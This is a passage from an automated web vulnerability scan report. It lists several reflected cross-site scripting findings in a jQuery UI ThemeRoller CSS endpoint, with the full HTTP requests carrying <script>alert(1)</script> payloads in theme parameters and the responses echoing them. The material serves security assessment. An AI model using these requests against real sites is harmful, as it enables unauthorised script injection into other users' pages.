HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:16 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=8888888cb93<script>alert(1)</script>2054306e127&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent
...[SNIP]...

1.183. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload cb31c<script>alert(1)</script>f71316665e8 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555cb31c<script>alert(1)</script>f71316665e8&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:59 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555cb31c<script>alert(1)</script>f71316665e8&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityE
...[SNIP]...

1.184. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHover request parameter is copied into the HTML document as plain text between tags. The payload 66e25<script>alert(1)</script>96f00a64c19 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd66e25<script>alert(1)</script>96f00a64c19&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:35 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd66e25<script>alert(1)</script>96f00a64c19&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&bord
...[SNIP]...

1.185. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorOverlay request parameter is copied into the HTML document as plain text between tags. The payload 2887c<script>alert(1)</script>e26ef74f3f3 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666662887c<script>alert(1)</script>e26ef74f3f3&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:21 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
hlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666662887c<script>alert(1)</script>e26ef74f3f3&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopSh
...[SNIP]...

1.186. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorShadow request parameter is copied into the HTML document as plain text between tags. The payload aa747<script>alert(1)</script>ae06a9ab634 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000aa747<script>alert(1)</script>ae06a9ab634&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:23 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
gOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000aa747<script>alert(1)</script>ae06a9ab634&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/* Component containers
------------------
...[SNIP]...

1.187. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the HTML document as plain text between tags. The payload 63249<script>alert(1)</script>2287361c851 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=1563249<script>alert(1)</script>2287361c851&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:52 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=1563249<script>alert(1)</script>2287361c851&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc
...[SNIP]...

1.188. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the HTML document as plain text between tags. The payload 79d6f<script>alert(1)</script>a8d1c1087c9 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=1679d6f<script>alert(1)</script>a8d1c1087c9&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:30 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
TextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=1679d6f<script>alert(1)</script>a8d1c1087c9&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconCo
...[SNIP]...

1.189. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the HTML document as plain text between tags. The payload d8c21<script>alert(1)</script>34a957472a0 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35d8c21<script>alert(1)</script>34a957472a0&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:33 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
reContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35d8c21<script>alert(1)</script>34a957472a0&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c
...[SNIP]...

1.190. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityError request parameter is copied into the HTML document as plain text between tags. The payload 8c30a<script>alert(1)</script>8f51bf51bab was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958c30a<script>alert(1)</script>8f51bf51bab&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:09 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958c30a<script>alert(1)</script>8f51bf51bab&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em;
...[SNIP]...

1.191. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the HTML document as plain text between tags. The payload c2cf2<script>alert(1)</script>6fc6ab53cc7 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15c2cf2<script>alert(1)</script>6fc6ab53cc7&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
